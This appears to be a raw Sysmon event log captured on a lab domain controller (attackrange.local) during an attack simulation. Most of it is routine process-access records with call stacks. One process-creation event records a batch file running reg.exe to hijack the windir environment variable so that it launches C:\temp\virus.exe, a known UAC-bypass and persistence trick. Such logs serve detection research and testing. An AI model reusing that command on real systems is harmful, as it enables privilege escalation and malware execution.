07:56:56.247{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050593Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:56.247{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050592Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:56.247{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050591Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:56.247{466BC892-32CD-60E8-670B-00000000CF01}45166612C:\Windows\system32\csrss.exe{466BC892-F5C8-60EB-677D-00000000CF01}6884C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001050590Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:56.247{466BC892-F5C8-60EB-647D-00000000CF01}98726276C:\Windows\system32\cmd.exe{466BC892-F5C8-60EB-677D-00000000CF01}6884C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+8ad9|C:\Windows\system32\cmd.exe+6fdd|C:\Windows\system32\cmd.exe+11a9e|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001050589Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:56.254{466BC892-F5C8-60EB-677D-00000000CF01}6884C:\Windows\System32\reg.exe10.0.14393.0 (rs1_release.160715-1616)Registry Console ToolMicrosoft® Windows® Operating SystemMicrosoft Corporationreg.exereg add "HKCU\Environment" /v "windir" /d "cmd /c start C:\temp\virus.exe&REM " C:\Temp\test\ATTACKRANGE\bob{466BC892-32CE-60E8-37BC-780000000000}0x78bc373MediumMD5=59A22FA6CF85026BB6BC69A1ADD75C50,SHA256=9E28034CE3AEEA6951F790F8997DF44CFBF80BEFF9FB17413DBA317016A716AD,IMPHASH=EE7EB7FA7D163340753B7223ADA14352{466BC892-F5C8-60EB-647D-00000000CF01}9872C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Temp\test\sil.bat" " 10341000x80000000000000001050588Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:56.200{466BC892-F5C8-60EB-657D-00000000CF01}84086488C:\Windows\system32\conhost.exe{466BC892-F5C8-60EB-667D-00000000CF01}9408C:\Windows\system32\mode.com0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050587Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:56.200{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050586Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:56.200{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050585Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:56.200{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050584Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:56.200{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050583Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:56.200{466BC892-32CD-60E8-670B-00000000CF01}45166612C:\Windows\system32\csrss.exe{466BC892-F5C8-60EB-667D-00000000CF01}9408C:\Windows\system32\mode.com0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001050582Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:56.200{466BC892-F5C8-60EB-647D-00000000CF01}98726276C:\Windows\system32\cmd.exe{466BC892-F5C8-60EB-667D-00000000CF01}9408C:\Windows\system32\mode.com0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+8ad9|C:\Windows\system32\cmd.exe+6fdd|C:\Windows\system32\cmd.exe+11a9e|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001050581Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:56.208{466BC892-F5C8-60EB-667D-00000000CF01}9408C:\Windows\System32\mode.com10.0.14393.0 (rs1_release.160715-1616)DOS Device MODE UtilityMicrosoft® Windows® Operating SystemMicrosoft CorporationMODE.COMmode 18,1C:\Temp\test\ATTACKRANGE\bob{466BC892-32CE-60E8-37BC-780000000000}0x78bc373MediumMD5=614F8D56EE8470746B6F68CEA0C2A838,SHA256=95696BF3D50A47A840D8CED5CD0E88677372411E9AB698B644244051B69C6E6A,IMPHASH=FD0E8966C3BCFE9DE1C17814481140CD{466BC892-F5C8-60EB-647D-00000000CF01}9872C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Temp\test\sil.bat" " 10341000x80000000000000001050580Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:56.185{466BC892-32D3-60E8-770B-00000000CF01}63566316C:\Windows\Explorer.EXE{466BC892-F5C8-60EB-647D-00000000CF01}9872C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+62945|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050579Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:56.185{466BC892-32D3-60E8-770B-00000000CF01}63566316C:\Windows\Explorer.EXE{466BC892-F5C8-60EB-647D-00000000CF01}9872C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050578Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:56.185{466BC892-32D3-60E8-770B-00000000CF01}63566316C:\Windows\Explorer.EXE{466BC892-F5C8-60EB-647D-00000000CF01}9872C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050577Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:56.185{466BC892-32D3-60E8-730B-00000000CF01}59843788C:\Windows\System32\taskhostw.exe{466BC892-F5C8-60EB-657D-00000000CF01}8408C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050576Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:56.183{466BC892-32D3-60E8-730B-00000000CF01}59843788C:\Windows\System32\taskhostw.exe{466BC892-F5C8-60EB-657D-00000000CF01}8408C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050575Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:56.163{466BC892-32D3-60E8-770B-00000000CF01}635610084C:\Windows\Explorer.EXE{466BC892-F5C8-60EB-647D-00000000CF01}9872C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+62945|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050574Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:56.163{466BC892-32D3-60E8-770B-00000000CF01}635610084C:\Windows\Explorer.EXE{466BC892-F5C8-60EB-647D-00000000CF01}9872C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050573Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:56.163{466BC892-32D3-60E8-770B-00000000CF01}635610084C:\Windows\Explorer.EXE{466BC892-F5C8-60EB-647D-00000000CF01}9872C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050572Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:56.163{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-F5C8-60EB-657D-00000000CF01}8408C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+622c0|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050571Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:56.163{466BC892-32D3-60E8-770B-00000000CF01}635610084C:\Windows\Explorer.EXE{466BC892-F5C8-60EB-647D-00000000CF01}9872C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050570Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:56.163{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-F5C8-60EB-657D-00000000CF01}8408C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47c90|C:\Windows\System32\SHELL32.dll+6227c|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050569Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:56.163{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-F5C8-60EB-657D-00000000CF01}8408C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62250|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050568Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:56.163{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-F5C8-60EB-657D-00000000CF01}8408C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d2c9|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050567Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:56.147{466BC892-02B0-60E8-1600-00000000CF01}13044400C:\Windows\System32\svchost.exe{466BC892-F5C8-60EB-657D-00000000CF01}8408C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050566Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:56.147{466BC892-02B0-60E8-1600-00000000CF01}13041340C:\Windows\System32\svchost.exe{466BC892-F5C8-60EB-657D-00000000CF01}8408C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050565Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:56.147{466BC892-F5C8-60EB-657D-00000000CF01}84086488C:\Windows\system32\conhost.exe{466BC892-F5C8-60EB-647D-00000000CF01}9872C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050564Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:56.132{466BC892-32CD-60E8-670B-00000000CF01}45164260C:\Windows\system32\csrss.exe{466BC892-F5C8-60EB-657D-00000000CF01}8408C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 23542300x80000000000000001050563Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:56.132{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=88863E4281176D48D00A6171BF4BE378,SHA256=8BC38FC67941AFBC42F68C429D6551814FC0B29AB511C42AC6BB1C8BA48B2156,IMPHASH=00000000000000000000000000000000falsetrue 13241300x80000000000000001050562Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localInvDBSetValue2021-07-12 07:56:56.132{466BC892-02AF-60E8-1400-00000000CF01}1028C:\Windows\System32\svchost.exeHKU\S-1-5-21-2333072374-3391925831-3197092227-1112\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Store\C:\Temp\test\sil.batBinary Data 10341000x80000000000000001050561Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:56.132{466BC892-02AF-60E8-1400-00000000CF01}10285432C:\Windows\System32\svchost.exe{466BC892-F5C8-60EB-647D-00000000CF01}9872C:\Windows\system32\cmd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\pcasvc.dll+52e4|c:\windows\system32\pcasvc.dll+58a9|c:\windows\system32\pcasvc.dll+5b49|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 